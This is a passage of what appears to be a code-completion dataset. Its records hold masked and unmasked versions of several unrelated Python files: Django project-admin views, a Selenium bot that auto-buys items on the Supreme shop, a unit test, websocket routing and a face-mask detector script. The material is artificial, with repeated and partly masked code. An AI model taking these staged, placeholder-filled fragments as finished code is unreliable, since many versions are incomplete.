PROJECT_ENABLE)\n rc.project_name = kwargs['name']\n if rc.project == None:\n raise Http404\n if rc.project.owner != request.user:\n if request.user.supper is False:\n return HttpResponseForbidden()\n return view_func(request, *args, **kwargs)\n return wrap(view_func, _wrapped_view)\n\n\ndef can_access(prj, user):\n if prj is None or prj.status != consts.PROJECT_ENABLE:\n raise Http404\n if prj.is_public:\n return None\n if user.is_authenticated() is False:\n return HttpResponseForbidden()\n if prj.owner != user:\n pm = q_get(ProjectMember, project=prj, user=user)\n if pm is None:\n return HttpResponseForbidden()\n return None\n\n\ndef can_write(prj, user):\n if prj is None or prj.status != consts.PROJECT_ENABLE:\n return False\n if user.is_authenticated() is False:\n return False\n if prj.owner != user:\n pm = q_get(ProjectMember, project=prj, user=user)\n if pm is None:\n return False\n return True\n\n\n@need_owner\n@as_json\n@login_required\ndef do_invite(request, name):\n if request.method != 'POST':\n return False\n uname = request.POST.get('u', '').strip()\n if len(uname) <= 0:\n return False\n user = q_get(User, Q(name=uname) | Q(email=uname))\n if user is None or user == request.user:\n return False\n rc = request.rc\n pm = q_get(ProjectMember, project=rc.project, user=user)\n if pm is not None:\n if pm.member_type != consts.PM_ACCEPT_INV:\n pm.member_type = consts.PM_SEND_INV\n pm.save()\n return True\n pm = ProjectMember()\n pm.project = rc.project\n pm.user = user\n pm.member_type = consts.PM_SEND_INV\n pm.save()\n return True\n\n\n@login_required\n@need_owner\ndef project_admin(request, name):\n rc = request.rc\n rc.pagename = name + ' admin'\n uri = request.META['PATH_INFO']\n rc.navmenus = build_prj_nav_menu(request, rc.project, 'admin')\n res = []\n vls = q_gets(Issue, project=rc.project, status__in=(consts.ISSUE_OPEN,\n consts.ISSUE_CLOSED)).values('project').annotate(pc=Count('project'))\n res.append(['Issue Count', len(vls) > 0 and vls[0]['pc'] or 0])\n vls = q_gets(ProjectAttachment, project=rc.project, status=consts.\n FILE_ENABLE).values('project').annotate(pc=Count('project'))\n res.append(['Attachemts Count', len(vls) > 0 and vls[0]['pc'] or 0])\n vls = q_gets(ProjectAttachment, project=rc.project, status=consts.\n FILE_ENABLE).values('project').annotate(ps=Sum('size'))\n si = (len(vls) > 0 and vls[0]['ps'] or 0) / (1024 * 1024.0)\n res.append(['Attachemts Total Size', '%.4s MB' % si])\n r, out, err = exec_cmd(['du', '-sbh', os.path.join(settings.REPOS_ROOT,\n name)])\n res.append(['Repository Usage', r != 0 and '0.0 MB' or out.split()[0]])\n rc.res = res\n rc.licenses = map(lambda x: x[0], consts.LICENSES)\n if rc.project.status != consts.PROJECT_ENABLE:\n raise Http404\n return send_response(request, 'project/admin.html')\n\n\n@login_required\n@need_owner\ndef project_resources(request, name):\n rc = request.rc\n rc.pagename = 'Project resources usages'\n uri = '/p/' + name + '/admin'\n rc.navmenus = [{'uri': uri, 'txt': 'basic'}, {'uri': uri + 'resouces',\n 'txt': 'resources', 'choice': True}]\n if rc.project.status != consts.PROJECT_ENABLE:\n raise Http404\n return send_response(request, 'project/resources.html')\n\n\n@as_json\ndef get_members(request, name):\n project = q_get(Project, name=name)\n if project is None:\n return False\n resp = can_access(project, request.user)\n if resp is not None:\n return False\n members = q_gets(ProjectMember, project=project)\n return True, [m.json() for m in members]\n\n\ndef do_invite_op(request, name, op):\n if request.method != 'POST':\n return False\n project = q_get(Project, Q(name=name))\n if project is None:\n return False\n pm = q_get(ProjectMember, project=project, user=request.user)\n if pm is None:\n return False\n pm.member_type = op\n pm.save()\n if op == consts.PM_ACCEPT_INV:\n activity.join_member(project, request.user, request.user)\n return True\n\n\n@as_json\n@login_required\ndef do_accept(request, name):\n return do_invite_op(request, name, consts.PM_ACCEPT_INV)\n\n\n@as_json\n@login_required\ndef do_reject(request, name):\n return do_invite_op(request, name, consts.PM_REJECT_INV)\n\n\n@as_json\n@login_required\ndef do_exit(request, name):\n project = q_get(Project, name=name)\n if project is None:\n return False\n ProjectMember.objects.filter(project=project, user=request.user).delete()\n activity.leave_member(project, request.user, request.user)\n return True\n\n\n@login_required\n@need_owner\n@as_json\ndef del_member(request, name):\n if request.method != 'POST':\n return False\n uname = request.POST.get('u', '').strip()\n if len(uname) <= 0:\n return False\n rc = request.rc\n ProjectMember.objects.filter(project=rc.project, user=User.objects.\n filter(name=uname)).delete()\n return True\n\n\n@login_required\n@need_owner\n@as_json\ndef del_prj(request, name):\n if request.method != 'POST':\n return False\n del_name = name + '__DELETED__%s' % time.time()\n project = request.rc.project\n old_name = project.name\n project.name = del_name\n project.status = consts.PROJECT_MARK_DELETED\n project.save()\n svn.del_repos(old_name, del_name)\n return True, reverse('apps.user.views.view_user', args=[])\n\n\n@login_required\n@need_owner\n@as_json\ndef edit_prj(request, name):\n if request.method != 'POST':\n return False\n project = request.rc.project\n title = request.POST.get('t', '').strip()\n if len(title) <= 0:\n return False\n license = request.POST.get('l', '').strip()\n is_public = request.POST.get('pub', '0').strip()\n project.title = title\n project.license = license\n project.is_public = bool(int(is_public))\n project.save()\n return True\n", "step-4": "from django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.http import *\nfrom django import forms\nfrom django.db.models import Count, Sum, Q\nfrom taocode2.models import *\nfrom taocode2.helper.utils import *\nfrom taocode2.helper.func import wrap\nfrom taocode2.helper import consts\nfrom taocode2.apps.user import activity\nfrom taocode2.apps.repos import svn\nfrom taocode2.settings import *\nimport time\n__author__ = 'luqi@taobao.com'\n\n\ndef build_prj_nav_menu(request, project, choice=None):\n uri = '/p/' + project.name\n navmenus = [{'uri': uri + '/src', 'txt': 'source'}, {'uri': uri +\n '/issues', 'txt': 'issues'}, {'uri': uri + '/wiki', 'txt': 'wiki'},\n {'uri': uri + '/info', 'txt': 'info'}]\n if project.owner == request.user:\n navmenus.append({'uri': uri + '/admin', 'txt': 'admin'})\n if choice is None:\n navmenus[0]['choice'] = True\n else:\n for m in navmenus:\n if m['uri'].endswith(choice):\n m['choice'] = True\n return navmenus\n\n\ndef need_owner(view_func):\n\n def _wrapped_view(request, *args, **kwargs):\n rc = request.rc\n rc.project = q_get(Project, name=kwargs['name'], status=consts.\n PROJECT_ENABLE)\n rc.project_name = kwargs['name']\n if rc.project == None:\n raise Http404\n if rc.project.owner != request.user:\n if request.user.supper is False:\n return HttpResponseForbidden()\n return view_func(request, *args, **kwargs)\n return wrap(view_func, _wrapped_view)\n\n\ndef can_access(prj, user):\n if prj is None or prj.status != consts.PROJECT_ENABLE:\n raise Http404\n if prj.is_public:\n return None\n if user.is_authenticated() is False:\n return HttpResponseForbidden()\n if prj.owner != user:\n pm = q_get(ProjectMember, project=prj, user=user)\n if pm is None:\n return HttpResponseForbidden()\n return None\n\n\ndef can_write(prj, user):\n if prj is None or prj.status != consts.PROJECT_ENABLE:\n return False\n if user.is_authenticated() is False:\n return False\n if prj.owner != user:\n pm = q_get(ProjectMember, project=prj, user=user)\n if pm is None:\n return False\n return True\n\n\n@need_owner\n@as_json\n@login_required\ndef do_invite(request, name):\n if request.method != 'POST':\n return False\n uname = request.POST.get('u', '').strip()\n if len(uname) <= 0:\n return False\n user = q_get(User, Q(name=uname) | Q(email=uname))\n if user is None or user == request.user:\n return False\n rc = request.rc\n pm = q_get(ProjectMember, project=rc.project, user=user)\n if pm is not None:\n if pm.member_type != consts.PM_ACCEPT_INV:\n pm.member_type = consts.PM_SEND_INV\n pm.save()\n return True\n pm = ProjectMember()\n pm.project = rc.project\n pm.user = user\n pm.member_type = consts.PM_SEND_INV\n pm.save()\n return True\n\n\n@login_required\n@need_owner\ndef project_admin(request, name):\n rc = request.rc\n rc.pagename = name + ' admin'\n uri = request.META['PATH_INFO']\n rc.navmenus = build_prj_nav_menu(request, rc.project, 'admin')\n res = []\n vls = q_gets(Issue, project=rc.project, status__in=(consts.ISSUE_OPEN,\n consts.ISSUE_CLOSED)).values('project').annotate(pc=Count('project'))\n res.append(['Issue Count', len(vls) > 0 and vls[0]['pc'] or 0])\n vls = q_gets(ProjectAttachment, project=rc.project, status=consts.\n FILE_ENABLE).values('project').annotate(pc=Count('project'))\n res.append(['Attachemts Count', len(vls) > 0 and vls[0]['pc'] or 0])\n vls = q_gets(ProjectAttachment, project=rc.project, status=consts.\n FILE_ENABLE).values('project').annotate(ps=Sum('size'))\n si = (len(vls) > 0 and vls[0]['ps'] or 0) / (1024 * 1024.0)\n res.append(['Attachemts Total Size', '%.4s MB' % si])\n r, out, err = exec_cmd(['du', '-sbh', os.path.join(settings.REPOS_ROOT,\n name)])\n res.append(['Repository Usage', r != 0 and '0.0 MB' or out.split()[0]])\n rc.res = res\n rc.licenses = map(lambda x: x[0], consts.LICENSES)\n if rc.project.status != consts.PROJECT_ENABLE:\n raise Http404\n return send_response(request, 'project/admin.html')\n\n\n@login_required\n@need_owner\ndef project_resources(request, name):\n rc = request.rc\n rc.pagename = 'Project resources usages'\n uri = '/p/' + name + '/admin'\n rc.navmenus = [{'uri': uri, 'txt': 'basic'}, {'uri': uri + 'resouces',\n 'txt': 'resources', 'choice': True}]\n if rc.project.status != consts.PROJECT_ENABLE:\n raise Http404\n return send_response(request, 'project/resources.html')\n\n\n@as_json\ndef get_members(request, name):\n project = q_get(Project, name=name)\n if project is None:\n return False\n resp = can_access(project, request.user)\n if resp is not None:\n return False\n members = q_gets(ProjectMember, project=project)\n return True, [m.json() for m in members]\n\n\ndef do_invite_op(request, name, op):\n if request.method != 'POST':\n return False\n project = q_get(Project, Q(name=name))\n if project is None:\n return False\n pm = q_get(ProjectMember, project=project, user=request.user)\n if pm is None:\n return False\n pm.member_type = op\n pm.save()\n if op == consts.PM_ACCEPT_INV:\n activity.join_member(project, request.user, request.user)\n return True\n\n\n@as_json\n@login_required\ndef do_accept(request, name):\n return do_invite_op(request, name, consts.PM_ACCEPT_INV)\n\n\n@as_json\n@login_required\ndef do_reject(request, name):\n return do_invite_op(request, name, consts.PM_REJECT_INV)\n\n\n@as_json\n@login_required\ndef do_exit(request, name):\n project = q_get(Project, name=name)\n if project is None:\n return False\n ProjectMember.objects.filter(project=project, user=request.user).delete()\n activity.leave_member(project, request.user, request.user)\n return True\n\n\n@login_required\n@need_owner\n@as_json\ndef del_member(request, name):\n if request.method != 'POST':\n return False\n uname = request.POST.get('u', '').strip()\n if len(uname) <= 0:\n return False\n rc = request.rc\n ProjectMember.objects.filter(project=rc.project, user=User.objects.\n filter(name=uname)).delete()\n return True\n\n\n@login_required\n@need_owner\n@as_json\ndef del_prj(request, name):\n if request.method != 'POST':\n return False\n del_name = name + '__DELETED__%s' % time.time()\n project = request.rc.project\n old_name = project.name\n project.name = del_name\n project.status = consts.PROJECT_MARK_DELETED\n project.save()\n svn.del_repos(old_name, del_name)\n return True, reverse('apps.user.views.view_user', args=[])\n\n\n@login_required\n@need_owner\n@as_json\ndef edit_prj(request, name):\n if request.method != 'POST':\n return False\n project = request.rc.project\n title = request.POST.get('t', '').strip()\n if len(title) <= 0:\n return False\n license = request.POST.get('l', '').strip()\n is_public = request.POST.get('pub', '0').strip()\n project.title = title\n project.license = license\n project.is_public = bool(int(is_public))\n project.save()\n return True\n", "step-5": "# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2011 Taobao .Inc\n# All rights reserved.\n#\n# This software is licensed as described in the file COPYING, which\n# you should have received as part of this distribution. The terms\n# are also available at http://code.taobao.org/license.html.\n#\n# This software consists of voluntary contributions made by many\n# individuals. For the exact contribution history, see the revision\n# history and logs, available at http://code.taobao.org/.\n\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.http import *\nfrom django import forms\nfrom django.db.models import Count,Sum,Q\n\nfrom taocode2.models import *\nfrom taocode2.helper.utils import *\nfrom taocode2.helper.func import wrap\nfrom taocode2.helper import consts\nfrom taocode2.apps.user import activity\nfrom taocode2.apps.repos import svn\n\nfrom taocode2.settings import *\nimport time\n\n\n__author__ = 'luqi@taobao.com'\n\n\ndef build_prj_nav_menu(request, project, choice = None):\n uri = '/p/'+project.name\n\n navmenus = [{'uri': uri + '/src', 'txt':'source'},\n {'uri': uri + '/issues', 'txt':'issues'},\n {'uri': uri + '/wiki', 'txt':'wiki'},\n {'uri': uri + '/info', 'txt':'info'}]\n\n if project.owner == request.user:\n navmenus.append({'uri': uri + '/admin', 'txt':'admin'})\n\n if choice is None:\n navmenus[0]['choice'] = True\n else:\n for m in navmenus:\n if m['uri'].endswith(choice):\n m['choice'] = True\n return navmenus\n\ndef need_owner(view_func):\n def _wrapped_view(request, *args, **kwargs):\n rc = request.rc\n rc.project = q_get(Project, name=kwargs['name'],\n status = consts.PROJECT_ENABLE)\n rc.project_name = kwargs['name']\n\n if rc.project == None:\n raise Http404\n\n if rc.project.owner != request.user:\n if request.user.supper is False:\n return HttpResponseForbidden()\n return view_func(request, *args, **kwargs)\n return wrap(view_func, _wrapped_view)\n\ndef can_access(prj, user):\n if prj is None or prj.status != consts.PROJECT_ENABLE:\n raise Http404\n\n if prj.is_public:\n return None\n\n if user.is_authenticated() is False:\n return HttpResponseForbidden()\n\n if prj.owner != user:\n pm = q_get(ProjectMember, project = prj, user = user)\n if pm is None:\n return HttpResponseForbidden()\n return None\n\n\ndef can_write(prj, user):\n if prj is None or prj.status != consts.PROJECT_ENABLE:\n return False\n\n if user.is_authenticated() is False:\n return False\n\n if prj.owner != user:\n pm = q_get(ProjectMember, project = prj, user = user)\n if pm is None:\n return False\n return True\n \n\n@need_owner\n@as_json\n@login_required\ndef do_invite(request, name):\n if request.method != 'POST':\n return False\n uname = request.POST.get('u', '').strip()\n if len(uname) <= 0:\n return False\n \n user = q_get(User, Q(name=uname)|Q(email=uname))\n if user is None or user == request.user:\n return False\n\n rc = request.rc\n\n pm = q_get(ProjectMember,\n project=rc.project, user=user)\n \n if pm is not None:\n if pm.member_type != consts.PM_ACCEPT_INV:\n pm.member_type = consts.PM_SEND_INV\n pm.save()\n return True\n \n pm = ProjectMember()\n pm.project = rc.project\n pm.user = user\n pm.member_type = consts.PM_SEND_INV\n pm.save()\n\n return True\n\n@login_required\n@need_owner\ndef project_admin(request, name):\n rc = request.rc\n rc.pagename = name + ' admin'\n uri = request.META['PATH_INFO']\n \n #rc.navmenus = [{'uri': uri, 'txt':'basic', 'choice':True},\n # {'uri': uri + 'resources', 'txt':'resources'}]\n\n rc.navmenus = build_prj_nav_menu(request, rc.project, 'admin')\n\n res = []\n vls = q_gets(Issue, project = rc.project,\n status__in = (consts.ISSUE_OPEN, \n consts.ISSUE_CLOSED)).values('project').annotate(pc=Count('project'))\n res.append(['Issue Count', \n len(vls) > 0 and vls[0]['pc'] or 0])\n vls = q_gets(ProjectAttachment, project = rc.project,\n status = consts.FILE_ENABLE).values('project').annotate(pc=Count('project'))\n\n res.append(['Attachemts Count',\n len(vls) > 0 and vls[0]['pc'] or 0])\n \n vls = q_gets(ProjectAttachment,\n project = rc.project,\n status = consts.FILE_ENABLE).values('project').annotate(ps=Sum('size'))\n \n si = (len(vls) > 0 and vls[0]['ps'] or 0) / (1024*1024.0)\n \n res.append(['Attachemts Total Size','%.4s MB'%si])\n\n r,out, err = exec_cmd(['du','-sbh', os.path.join(settings.REPOS_ROOT, name)])\n res.append(['Repository Usage', r != 0 and '0.0 MB' or out.split()[0]])\n\n rc.res = res\n\n rc.licenses = map(lambda x:x[0], consts.LICENSES)\n if rc.project.status != consts.PROJECT_ENABLE:\n raise Http404\n\n return send_response(request, 'project/admin.html')\n\n\n@login_required\n@need_owner\ndef project_resources(request, name):\n rc = request.rc\n rc.pagename = 'Project resources usages'\n uri = '/p/'+name+'/admin'\n \n rc.navmenus = [{'uri': uri, 'txt':'basic'},\n {'uri': uri + 'resouces',\n 'txt':'resources', 'choice':True}]\n\n if rc.project.status != consts.PROJECT_ENABLE:\n raise Http404\n\n return send_response(request, 'project/resources.html')\n\n\n@as_json\ndef get_members(request, name):\n project = q_get(Project, name=name)\n if project is None:\n return False\n \n resp = can_access(project, request.user)\n if resp is not None:\n return False\n\n members = q_gets(ProjectMember, project=project) \n return (True, [m.json() for m in members])\n\ndef do_invite_op(request, name, op):\n if request.method != 'POST':\n return False\n\n project = q_get(Project, Q(name=name))\n\n if project is None:\n return False\n pm = q_get(ProjectMember, project=project, user=request.user)\n\n if pm is None:\n return False\n\n pm.member_type = op\n pm.save()\n\n if op == consts.PM_ACCEPT_INV:\n activity.join_member(project, request.user, request.user)\n\n return True\n\n@as_json\n@login_required\ndef do_accept(request, name):\n return do_invite_op(request, name, \n consts.PM_ACCEPT_INV)\n\n@as_json\n@login_required\ndef do_reject(request, name):\n return do_invite_op(request, name,\n consts.PM_REJECT_INV)\n\n@as_json\n@login_required\ndef do_exit(request, name):\n \n project = q_get(Project, name = name)\n \n if project is None:\n return False\n \n ProjectMember.objects.filter(project = project,\n user = request.user).delete()\n\n activity.leave_member(project, request.user, request.user)\n return True\n\n@login_required\n@need_owner\n@as_json\ndef del_member(request, name):\n if request.method != 'POST':\n return False\n \n uname = request.POST.get('u', '').strip()\n if len(uname) <= 0:\n return False\n\n rc = request.rc\n\n ProjectMember.objects.filter(project = rc.project,\n user = User.objects.filter(name=uname)).delete()\n return True\n\n\n@login_required\n@need_owner\n@as_json\ndef del_prj(request, name):\n if request.method != 'POST':\n return False\n \n del_name = name + '__DELETED__%s'%time.time()\n\n project = request.rc.project\n old_name = project.name\n\n project.name = del_name\n project.status = consts.PROJECT_MARK_DELETED\n project.save()\n \n svn.del_repos(old_name, del_name)\n \n return (True, reverse('apps.user.views.view_user', args=[]))\n\n@login_required\n@need_owner\n@as_json\ndef edit_prj(request, name):\n if request.method != 'POST':\n return False\n \n project = request.rc.project\n title = request.POST.get('t','').strip()\n \n if len(title) <= 0:\n return False\n \n license = request.POST.get('l','').strip()\n is_public = request.POST.get('pub','0').strip()\n project.title = title\n project.license = license\n project.is_public = bool(int(is_public))\n project.save()\n\n return True\n\n\n", "step-ids": [ 7, 14, 16, 17, 18 ] }
[ 7, 14, 16, 17, 18 ]
a = range(10) [x*x for x in a]
normal
{ "blob_id": "018b9533074d2766dc5010ff9c5e70888d249b45", "index": 1832, "step-1": "<mask token>\n", "step-2": "<mask token>\n[(x * x) for x in a]\n", "step-3": "a = range(10)\n[(x * x) for x in a]\n", "step-4": "a = range(10)\n[x*x for x in a]\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
""" Supreme bot???? """ import os import time from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait import selenium.webdriver.support.expected_conditions as EC from selenium.common.exceptions import TimeoutException from selenium.webdriver.chrome.options import Options path_to_chromedriver = '/Users/Alan/Desktop/Github/SupremeBot/chromedriver' url = "https://www.supremenewyork.com/shop/new" path_to_log = '/Users/Alan/Desktop/' log_errors = open(path_to_log + 'log_errors.txt', mode = 'w') userProfile = "C:/Users/Alan/AppData/Local/Google/Chrome/User Data" chop = webdriver.ChromeOptions() chop.add_argument("user-data-dir=C:/Users/Alan/AppData/Local/Google/Chrome/User Data") def initDriver(): driver = webdriver.Chrome(executable_path=path_to_chromedriver, chrome_options=chop) driver.get(url) return driver def buyItem(theDriver): try: #Item you're trying to buy item = theDriver.find_element_by_xpath('//*[@id="container"]/article[44]/div/a').click() except TimeoutException: log_errors.write('Couldn\'t locate item' + '\n') def addCart(theDriver): try: print "Adding to Cart..." addCart = WebDriverWait(theDriver, 120).until(EC.element_to_be_clickable((By.NAME, 'commit'))) print addCart.get_attribute("value") addCart.click() except TimeoutException: print "Sold out!" log_errors.write('Sold out' + '\n') def checkout(theDriver): try: print "Checking out..." checkout = WebDriverWait(theDriver, 120).until(EC.element_to_be_clickable((By.XPATH, '//*[@id="cart"]/a[2]'))) time.sleep(.25) checkout.click() except TimeoutException: print "Rip!" log_errors.write('Error' + '\n') def fillInfo(theDriver): try: print "Entering info..." except TimeoutException: print "Error filling info" def readAndAgree(theDriver): try: print "Clicking agree..." #agree = theDriver.find_elements_by_css_selector('.iCheck-helper') #agree[1].click() agree = WebDriverWait(theDriver, 120).until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, '.iCheck-helper'))) agree[1].click() except TimeoutException: print "Not found" def main(): print "Bot running" driver = initDriver() buyItem(driver) addCart(driver) checkout(driver) readAndAgree(driver) while True: time.sleep(50) if __name__ == '__main__': main() print "Finished"
normal
{ "blob_id": "8fed95cf809afca7b6008d5abcdcf697367a33c2", "index": 2929, "step-1": "\"\"\"\nSupreme bot????\n\n\"\"\"\nimport os\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport selenium.webdriver.support.expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\n\npath_to_chromedriver = '/Users/Alan/Desktop/Github/SupremeBot/chromedriver'\nurl = \"https://www.supremenewyork.com/shop/new\"\npath_to_log = '/Users/Alan/Desktop/'\nlog_errors = open(path_to_log + 'log_errors.txt', mode = 'w')\nuserProfile = \"C:/Users/Alan/AppData/Local/Google/Chrome/User Data\"\n\n\nchop = webdriver.ChromeOptions()\nchop.add_argument(\"user-data-dir=C:/Users/Alan/AppData/Local/Google/Chrome/User Data\")\n\n\ndef initDriver():\n driver = webdriver.Chrome(executable_path=path_to_chromedriver, chrome_options=chop)\n driver.get(url)\n \n return driver\n\ndef buyItem(theDriver):\n try:\n #Item you're trying to buy\n item = theDriver.find_element_by_xpath('//*[@id=\"container\"]/article[44]/div/a').click()\n except TimeoutException:\n log_errors.write('Couldn\\'t locate item' + '\\n')\n\ndef addCart(theDriver):\n try:\n print \"Adding to Cart...\"\n addCart = WebDriverWait(theDriver, 120).until(EC.element_to_be_clickable((By.NAME, 'commit')))\n print addCart.get_attribute(\"value\")\n addCart.click()\n except TimeoutException:\n print \"Sold out!\"\n log_errors.write('Sold out' + '\\n')\n\ndef checkout(theDriver):\n try:\n print \"Checking out...\"\n checkout = WebDriverWait(theDriver, 120).until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"cart\"]/a[2]')))\n time.sleep(.25)\n checkout.click()\n except TimeoutException:\n print \"Rip!\"\n log_errors.write('Error' + '\\n')\n\ndef fillInfo(theDriver):\n try:\n print \"Entering info...\"\n except TimeoutException:\n print \"Error filling info\"\n\ndef readAndAgree(theDriver):\n try:\n print \"Clicking agree...\"\n \n #agree = theDriver.find_elements_by_css_selector('.iCheck-helper')\n #agree[1].click()\n \n agree = WebDriverWait(theDriver, 120).until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, '.iCheck-helper')))\n agree[1].click()\n except TimeoutException:\n print \"Not found\"\ndef main():\n print \"Bot running\"\n driver = initDriver()\n buyItem(driver)\n addCart(driver)\n checkout(driver)\n readAndAgree(driver)\n while True:\n time.sleep(50)\n\nif __name__ == '__main__':\n main()\n print \"Finished\"\n\n\n\n\n\n \n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from unittest import TestCase from utils.fileutils import is_empty_dir, clear_attributes class FileUtilsTest(TestCase): def test_is_empty_dir(self): self.assertFalse(is_empty_dir(r'c:\Windows')) def test_clear_attributes(self): clear_attributes(__file__)
normal
{ "blob_id": "89059915df8891efcbe742174bd468a1390598e3", "index": 3001, "step-1": "<mask token>\n\n\nclass FileUtilsTest(TestCase):\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass FileUtilsTest(TestCase):\n <mask token>\n\n def test_clear_attributes(self):\n clear_attributes(__file__)\n", "step-3": "<mask token>\n\n\nclass FileUtilsTest(TestCase):\n\n def test_is_empty_dir(self):\n self.assertFalse(is_empty_dir('c:\\\\Windows'))\n\n def test_clear_attributes(self):\n clear_attributes(__file__)\n", "step-4": "from unittest import TestCase\nfrom utils.fileutils import is_empty_dir, clear_attributes\n\n\nclass FileUtilsTest(TestCase):\n\n def test_is_empty_dir(self):\n self.assertFalse(is_empty_dir('c:\\\\Windows'))\n\n def test_clear_attributes(self):\n clear_attributes(__file__)\n", "step-5": "from unittest import TestCase\n\nfrom utils.fileutils import is_empty_dir, clear_attributes\n\n\nclass FileUtilsTest(TestCase):\n def test_is_empty_dir(self):\n self.assertFalse(is_empty_dir(r'c:\\Windows'))\n\n def test_clear_attributes(self):\n clear_attributes(__file__)\n\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from django.urls import re_path from .consumers import ChatConsumer, ChatLobbyConsumer websocket_urlpatterns = [ re_path(r'ws/chat/(?P<room_id>\w+)/$', ChatConsumer), re_path(r'ws/lobby/$', ChatLobbyConsumer), ]
normal
{ "blob_id": "1bd1769f94b93e0bb674adfd1bb96c778708f6d8", "index": 5593, "step-1": "<mask token>\n", "step-2": "<mask token>\nwebsocket_urlpatterns = [re_path('ws/chat/(?P<room_id>\\\\w+)/$',\n ChatConsumer), re_path('ws/lobby/$', ChatLobbyConsumer)]\n", "step-3": "from django.urls import re_path\nfrom .consumers import ChatConsumer, ChatLobbyConsumer\nwebsocket_urlpatterns = [re_path('ws/chat/(?P<room_id>\\\\w+)/$',\n ChatConsumer), re_path('ws/lobby/$', ChatLobbyConsumer)]\n", "step-4": "from django.urls import re_path\n\nfrom .consumers import ChatConsumer, ChatLobbyConsumer\n\nwebsocket_urlpatterns = [\n re_path(r'ws/chat/(?P<room_id>\\w+)/$', ChatConsumer),\n re_path(r'ws/lobby/$', ChatLobbyConsumer),\n]", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from core.detector import Detector from utils.augmentations import * from torchvision.transforms.transforms import Compose from config.mask_config import * from config.train_config import model_info np.random.seed(3) colors = np.random.randint(128, 256, (100, 3)) def to_image(det): size = 512 val_trans = [Normalization([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])] val_trans = Compose(val_trans) for i in range(5, 200): path = f"D:/temp_data/mask/test/{i}.jpg " print(path) image = cv2.imread(path) image = cv2.resize(image, (size, size)) bboxes = det.predict(image.copy(), size, (0.2, 0.2)) for cid, bbox in bboxes[0].items(): cls = "mask" if cid == 1 else "face" for b in bbox: prob = b[-1] b = b[:4].astype(int) cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), colors[cid].tolist(), 1, cv2.LINE_AA) cv2.putText(image, "{}:{}".format(cls, int(prob*100)), (b[0], b[1]), cv2.FONT_ITALIC, 1, colors[cid].tolist(), 2) cv2.imshow("image", image) cv2.waitKey() def to_video(det): size = 512 val_trans = [Normalization([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])] cap = cv2.VideoCapture(0 + cv2.CAP_DSHOW) # 参数为0时调用本地摄像头;url连接调取网络摄像头;文件地址获取本地视频 cap.set(3, 1920) # 设置分辨率 cap.set(4, 1080) cap.set(cv2.CAP_PROP_FPS, 30) ret, frame = cap.read() while (True): ret, frame = cap.read() frame = frame[:, ::-1] frame = frame[:, 440: -440] image = cv2.resize(frame, (size, size)) bboxes = det.predict(image.copy(), size, (0.5, 0.5)) for cid, bbox in bboxes[0].items(): cls = "mask" if cid == 1 else "face" for b in bbox: prob = b[-1] b = b[:4].astype(int) cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), colors[cid].tolist(), 1, cv2.LINE_AA) cv2.putText(image, "{}:{}".format(cls, int(prob * 100)), (b[0], b[1]), cv2.FONT_ITALIC, 1, colors[cid].tolist(), 2) cv2.imshow("image", image) if cv2.waitKey(1) & 0xFF == ord('q'): break if __name__ == '__main__': det = Detector(classes_info, model_info, "cuda") det.load_model("checkpoints/2021-03-08 00.11.56/epoch=331_4.7689.pth") # to_image(det) to_video(det)
normal
{ "blob_id": "97e7ca02d85267492a0dcbbda9d8754a0a3735a5", "index": 5315, "step-1": "<mask token>\n\n\ndef to_image(det):\n size = 512\n val_trans = [Normalization([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])]\n val_trans = Compose(val_trans)\n for i in range(5, 200):\n path = f'D:/temp_data/mask/test/{i}.jpg '\n print(path)\n image = cv2.imread(path)\n image = cv2.resize(image, (size, size))\n bboxes = det.predict(image.copy(), size, (0.2, 0.2))\n for cid, bbox in bboxes[0].items():\n cls = 'mask' if cid == 1 else 'face'\n for b in bbox:\n prob = b[-1]\n b = b[:4].astype(int)\n cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), colors[cid\n ].tolist(), 1, cv2.LINE_AA)\n cv2.putText(image, '{}:{}'.format(cls, int(prob * 100)), (b\n [0], b[1]), cv2.FONT_ITALIC, 1, colors[cid].tolist(), 2)\n cv2.imshow('image', image)\n cv2.waitKey()\n\n\ndef to_video(det):\n size = 512\n val_trans = [Normalization([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])]\n cap = cv2.VideoCapture(0 + cv2.CAP_DSHOW)\n cap.set(3, 1920)\n cap.set(4, 1080)\n cap.set(cv2.CAP_PROP_FPS, 30)\n ret, frame = cap.read()\n while True:\n ret, frame = cap.read()\n frame = frame[:, ::-1]\n frame = frame[:, 440:-440]\n image = cv2.resize(frame, (size, size))\n bboxes = det.predict(image.copy(), size, (0.5, 0.5))\n for cid, bbox in bboxes[0].items():\n cls = 'mask' if cid == 1 else 'face'\n for b in bbox:\n prob = b[-1]\n b = b[:4].astype(int)\n cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), colors[cid\n ].tolist(), 1, cv2.LINE_AA)\n cv2.putText(image, '{}:{}'.format(cls, int(prob * 100)), (b\n [0], b[1]), cv2.FONT_ITALIC, 1, colors[cid].tolist(), 2)\n cv2.imshow('image', image)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n\n\n<mask token>\n", "step-2": "<mask token>\nnp.random.seed(3)\n<mask token>\n\n\ndef to_image(det):\n size = 512\n val_trans = [Normalization([0.5, 0.5, 